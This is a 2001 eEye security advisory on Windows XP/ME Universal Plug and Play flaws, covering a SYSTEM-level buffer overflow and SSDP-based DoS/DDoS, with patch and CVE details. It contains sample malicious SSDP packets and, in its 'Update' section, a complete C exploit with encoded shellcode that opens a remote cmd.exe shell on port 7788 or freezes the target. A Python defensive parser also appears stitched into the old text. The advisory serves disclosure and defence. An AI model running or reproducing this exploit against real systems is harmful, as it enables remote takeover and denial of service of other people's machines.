21st Dec 2001 [SBWID-4949]
COMMAND
UPNP remote vulnerabilities
SYSTEMS AFFECTED
Microsoft Windows XP (All default systems)
Microsoft Windows 98 (Certain configurations)
Microsoft Windows 98SE (Certain configurations)
Microsoft Windows ME (Certain configurations)
PROBLEM
The eEye team (http://www.eeye.com) found three vulnerabilities in the
UPNP (Universal Plug and Play) Service, which can be used to detect and
integrate with UPNP aware devices: a remotely exploitable buffer
overflow that yields SYSTEM level access to any default installation of
Windows XP, a Denial of Service (DoS) attack, and a Distributed Denial
of Service (DDoS) attack.
Description:
============
Windows XP ships by default with a UPNP (Universal Plug and Play)
Service which can be used to detect and integrate with UPNP aware
devices. Windows ME does not ship by default with the UPNP service;
however, some OEM versions do provide the UPNP service by default. It is
also possible to install the Windows XP Internet Connection Sharing on
top of Windows 98, which makes it vulnerable as well.
"UPNP architecture offers pervasive peer-to-peer network connectivity
of PCs of all form factors, intelligent appliances, and wireless
devices. UPNP architecture leverages TCP/IP and the Web to enable
seamless proximity networking in addition to control and data transfer
among networked devices in the home, office, and everywhere in
between." as described on upnp.org.
We believe that there are several issues with the UPNP protocol itself.
However these more generic issues are out of the scope of this
advisory. Expect a detailed paper to be released from eEye within the
coming weeks.
This advisory covers three vulnerabilities within Microsoft's UPNP
implementation: a remotely exploitable buffer overflow to gain SYSTEM
level access to any default installation of Windows XP, a Denial of
Service (DoS) attack, and a Distributed Denial of Service (DDoS)
attack.
The SYSTEM Remote exploit
==========================
The first vulnerability, within Microsoft's implementation of the UPNP
protocol, can result in an attacker gaining remote SYSTEM level access
to any default installation of Windows XP. SYSTEM is the highest level
of access within Windows XP.
During testing of the UPNP service, we discovered that by sending
malformed advertisements at various speeds we could cause access
violations on the target machine. Most of these were due to pointers
being overwritten. The following describes one instance.
Example Session:
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=10
LOCATION: http://IPADDRESS:PORT/<buffer>.xml
NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1
NTS: ssdp:alive
SERVER: EEYE/2001 UPnP/1.0 product/1.1
USN: uuid:EEYE
If the buffer is incremented in the protocol, port, and URI fields of
the Location URL and sessions are sent at 10,000 microsecond intervals,
access violations begin to be observed. In one situation, the EAX and
ECX registers contain addresses that are pulled from memory that was
overwritten, and the svchost.exe process accesses an invalid memory
address at a "mov" instruction. It throws an access violation because
the destination address is an overwritten pointer, and there is nothing
interesting at 0x41414141.
During our testing we found that there were multiple points of
exploitation. In our testing we found instances of stack overflows and
heap overflows, both of which were exploitable. In the case of the heap
overflow we saw pointers being overwritten for both buffers and
functions.
The SSDP service also listens on Multicast and Broadcast addresses.
Therefore gaining SYSTEM access to an entire network of XP machines is
possible with only one anonymous UDP SSDP attack session.
The DoS and DDoS
================
UPNP consists of multiple protocols, one of which being the Simple
Service Discovery Protocol (SSDP). When a UPNP enabled device is
installed on a network, whether it be a computer, network device, or
even a household appliance, it sends out an advertisement to notify
control points of its existence. On a default XP installation, no
support is added for device control, as would be the case in an
installation of UPNP from "Network Services". Microsoft did, however,
add default support for an "InternetGatewayDevice": if a sniffer is run
on a network with XP, XP can be observed searching for this device as XP
is loading. This support was added to aid leading network hardware
manufacturers in making UPnP enabled "gateway devices".
By sending a malicious spoofed UDP packet containing an SSDP
advertisement, an attacker can force the XP/ME client to connect back
to a specified IP address and pass on a specified HTTP/HTTPS request.
An example session:
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=1
LOCATION: URL
NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1
NTS: ssdp:alive
SERVER: EEYE/2001 UPnP/1.0 PASSITON/1.1
USN: uuid:EEYE
The above packet data needs to be sent as a UDP packet to port 1900 of
the XP/ME machine.
When the XP machine receives this request, it will interpret the URL
following the LOCATION header entity. With no sanitizing of the URL, it
is passed on to the functions in the Windows Internet Services API. The
string is broken down and the new session is created.
For example:
LOCATION: http://xptest.example.com:19/himom.html
A malicious attacker could specify a chargen service on a remote
machine, causing the XP client to connect and get caught in a tight
read/malloc loop. Doing this will throw the machine into an unstable
state where CPU utilization is at 100% and memory is allocated to the
point that it is totally consumed. This makes the remote XP system
completely unusable and requires a physical power-off shutdown.
Attackers could also use this exploit to control other XP machines,
forcing such machines to perform Unicode attacks, double decode, or
random CGI exploiting. Due to the insecure nature of UDP, an attacker
can exploit security holes on a web server using UPNP with almost total
anonymity.
One of the bigger problems, and why this can become a DDoS attack, is
that this SSDP announcement can be sent to broadcast addresses and
multicast. It is therefore possible to send one UDP packet causing all
XP machines on the target network to be navigated to the URL of choice,
performing an attack of choice.
Also since parts of the UPNP service are implemented as UDP (in our
opinion, a bad idea), it makes all of these attacks completely
untraceable.
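Both sessions above hinge on how the LOCATION header is handled: overlong URL fields trigger the overflow, and an arbitrary host and port force the connect-back behind the DoS. The following is an added example, not part of the eEye advisory: a small Python parser for SSDP NOTIFY datagrams with defensive checks on the LOCATION URL, of the kind a network monitor or SSDP-aware filter would apply. The component length limit, the local address prefixes, and the sample datagrams are assumptions constructed for this example.

```python
from urllib.parse import urlsplit

# Assumed limits for a LOCATION URL advertised by a genuine device on this sample network.
MAX_COMPONENT = 256                   # longest scheme, host or path we accept
SUSPICIOUS_PORTS = {19}               # chargen: the read/malloc loop the advisory describes
LOCAL_PREFIXES = ("192.168.", "10.")  # assumed local address ranges

def parse_ssdp(datagram: bytes) -> dict:
    """Split an SSDP datagram into its start line (key '_start') and header fields."""
    lines = datagram.decode("latin-1").split("\r\n")
    headers = {"_start": lines[0]}
    for line in lines[1:]:
        if not line:                  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().upper()] = value.strip()
    return headers

def check_notify(datagram: bytes) -> list:
    """Return findings for an SSDP NOTIFY; an empty list means nothing looked malformed."""
    h = parse_ssdp(datagram)
    if not h["_start"].startswith("NOTIFY * HTTP/1.1"):
        return ["not an SSDP NOTIFY"]
    loc = h.get("LOCATION", "")
    if not loc:
        return ["missing LOCATION header"]
    findings = []
    parts = urlsplit(loc)
    host = parts.hostname or ""
    # Overlong URL components: the pattern eEye used to trigger the overflow.
    for name, value in (("scheme", parts.scheme), ("host", host), ("path", parts.path)):
        if len(value) > MAX_COMPONENT:
            findings.append(f"overlong {name} in LOCATION ({len(value)} bytes)")
    if parts.scheme.lower() not in ("http", "https"):
        findings.append(f"unexpected scheme {parts.scheme!r} in LOCATION")
    try:
        port = parts.port             # ValueError for a non-numeric or out-of-range port
    except ValueError:
        findings.append("invalid port in LOCATION")
        port = None
    # A LOCATION that drags the client to a non-web service or off the local network
    # is the forced connect-back behind the advisory's DoS/DDoS scenario.
    if port in SUSPICIOUS_PORTS:
        findings.append(f"LOCATION points at port {port} (chargen-style DoS)")
    if host and not host.startswith(LOCAL_PREFIXES):
        findings.append(f"LOCATION host {host} is outside the local network")
    return findings

def build_notify(location: str, max_age: int = 10) -> bytes:
    """Constructed NOTIFY in the advisory's header layout (test data, not a real device)."""
    return ("NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
            f"CACHE-CONTROL: max-age={max_age}\r\nLOCATION: {location}\r\n"
            "NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\nNTS: ssdp:alive\r\n"
            "SERVER: sample/1.0 UPnP/1.0 sample/1.0\r\nUSN: uuid:sample-device\r\n\r\n"
            ).encode("latin-1")

if __name__ == "__main__":
    print(check_notify(build_notify("http://203.0.113.5:19/himom.html", max_age=1)))
```

The host check only says whether the advertised device lives on the segment the NOTIFY arrived from; a real deployment would feed it the subnet of the interface that received the datagram.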
Update
======
Exploit:
/*
 * WinME/XP UPNP dos & overflow
 *
 * Run: ./XPloit host <option>
 *
 * Windows runs the "Universal Plug and Play technology" service
 * at port 5000. In the future this will allow for seamless
 * connectivity of various devices such as a printer.
 * This service has a DoS and a buffer overflow which I exploit here.
 *
 * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
 *
 * Author: hamada alborno
 * Email: webmasta100@hotmail.com
 * Webpage: http://www.a2z-net.net
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90

/***************************************************************************/
int main(int argc, char *argv[])
{
    int sockfd[MAX];
    char sendXP[] = "XP";
    char jmpcode[281], execode[840], request[2048];
    char *send_buffer;
    int num_socks;
    int bindport;
    int i;
    int port;
    unsigned char shellcode[] =
    "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
    "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
    "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
    "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
    "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
    "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
    "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
    "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
    "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
    "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
    "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
    "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
    "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
    "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
    "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
    "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
    "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
    "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
    "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
    "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
    "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
    "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
    "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
    "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
    "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
    "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
    "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
    "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
    "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
    "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
    "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
    "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
    "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
    "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
    "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
    "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
    "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
    "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
    "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
    "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
    "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
    "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
    "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
    "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
    "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
    "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
    "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
    "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
    "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
    "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
    "\x68\x68\x68\x68";
    struct hostent *he;
    struct sockaddr_in their_addr;

    if (argc != 3) {
        fprintf(stderr, "usage:%s <hostname> <command>\n", argv[0]);
        fprintf(stderr, "-f freeze the machine.\n");
        fprintf(stderr, "-e exploit.\n");
        exit(1);
    }
    if (strstr(argv[2], "-f")) {
        num_socks = FREEZE;
        send_buffer = sendXP;
    }
    if (strstr(argv[2], "-e")) {
        num_socks = 1;
        send_buffer = request;
        bindport ^= 0x9797;
        shellcode[778] = (bindport) & 0xff;
        shellcode[779] = (bindport >> 8) & 0xff;
        for (i = 0; i < 268; i++)
            jmpcode[i] = (char)NOP;
        jmpcode[268] = (char)0x4d;
        jmpcode[269] = (char)0x3f;
        jmpcode[270] = (char)0xe3;
        jmpcode[271] = (char)0x77;
        jmpcode[272] = (char)0x90;
        jmpcode[273] = (char)0x90;
        jmpcode[274] = (char)0x90;
        jmpcode[275] = (char)0x90;
        //jmp [ebx+0x64], jump to execute shellcode
        jmpcode[276] = (char)0xff;
        jmpcode[277] = (char)0x63;
        jmpcode[278] = (char)0x64;
        jmpcode[279] = (char)0x90;
        jmpcode[280] = (char)0x00;
        for (i = 0; i < 32; i++)
            execode[i] = (char)NOP;
        execode[32] = (char)0x00;
        strcat(execode, shellcode);
        snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, execode);
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
/***************************************************************************/
    for (i = 0; i < num_socks; i++)
        if ((sockfd[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            perror("socket"); exit(1);
        }
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(their_addr.sin_zero), 8);
    for (i = 0; i < num_socks; i++)
        if (connect(sockfd[i], (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
            perror("connect");
            exit(1);
        }
    for (i = 0; i < num_socks; i++)
        if (send(sockfd[i], send_buffer, strlen(send_buffer), 0) == -1) {
            perror("send");
            exit(0);
        }
    for (i = 0; i < num_socks; i++)
        close(sockfd[i]);
    return 0;
}
DoS exploit by Gabriel Maggiotti (unchecked), supplied as the
attachments chargen.c and upnp_udp.c.
SOLUTION
Vendor Status:
Microsoft has released a patch and security bulletin which is located
at:
http://www.microsoft.com/technet/security/bulletin/MS01-059.asp
To verify that the patch has been installed on your system use the
following:
Windows 98 and 98SE:
To verify that the patch has been installed on the machine, select
Start, then Run, then run the QFECheck utility. If the patch is
installed, "Windows 98 Q314941 Update" will be listed among the
installed patches. To verify the individual files, use the file
manifest provided in Knowledge Base article Q314941.
Windows ME:
To verify that the patch has been installed on the machine, select
Start, then Run, then run the QFECheck utility. If the patch is
installed, "Windows Millennium Edition Q314757 Update" will be listed
among the installed patches. To verify the individual files, use the
file manifest provided in Knowledge Base article Q314757.
Windows XP:
To verify that the patch has been installed on the machine, confirm
that the following registry key has been created on the machine:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\Q315000.
To verify the individual files, use the date/time and version
information provided in the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\Q315000\Filelist.
The Common Vulnerabilities and Exposures (CVE) project has assigned the
following two IDs:
The Buffer Overflow: CAN-2001-0876
The Denial of Service: CAN-2001-0877
These are candidates for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems.
We would strongly suggest denying all UPNP traffic at your Internet
borders, as there is really no need to allow UPNP traffic across the
Internet. It would also be wise to turn off the UPNP services
completely, as most users are probably not utilizing them anyway. The
fewer services running on your machine, the safer you will be. The SSDP
Discovery Service and Universal Plug and Play Host service should both
be set to manual load.
Discovery:
Riley Hassell <riley@eeye.com>
With extra help from:
Ryan Permeh - for technical advice and exploitation analysis for those
difficult reverse engineering situations that Ryan has wet dreams
about.
Marc Maiffret - as always with superb technical insight helping to
discover and exploit the vulnerabilities in this advisory and once
again proving that two heads are better than one.
Neothoth - "The typing machine", for camping out day and night in the
eEye lab hammering vulnerabilities in URL handlers. Neo rocks :)
Greetings:
Mr. Patron and his tequila and the Three Wise Men(jim, jack and
johnny). Also Abraxas coffeeshop in Amsterdam. eEye would like to offer
thanks to all organizations supporting full disclosure, especially
Securityfocus.com and NMRC. Don't let silly politics get in the way of
what is right for everyone's security.
oh yeah, one more thing:
Four score and numerous advisories ago, a security company set off to
tell the world about its love of Tequila. However, little did people
know, the team was not even legal. Now that the youngin's Marc and
Riley turned 21 this Nov. we are all officially legal. That means the
next time the NSA buys us beer at a sec conference, they won't be
breaking the law.
Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.
Disclaimer
The information provided in this advisory may change without notice.
Your reproduction or use of this information shall constitute your
acceptance of the terms in this paragraph. This information is provided
"AS IS" and eEye Digital Security disclaims all warranties, express
and implied, with regard to this information. This information is
provided only for legitimate security analysis purposes. eEye Digital
Security does not condone the unauthorized access of systems or the
writing or launching of worms, viruses or other software for malicious
purposes, and specifically prohibits the use or reproduction of this
information for such purposes. In no event shall eEye Digital Security
or any author be liable for any damages whatsoever arising out of or in
connection with the use or dissemination of this information. Any use
of this information is at the user's own risk.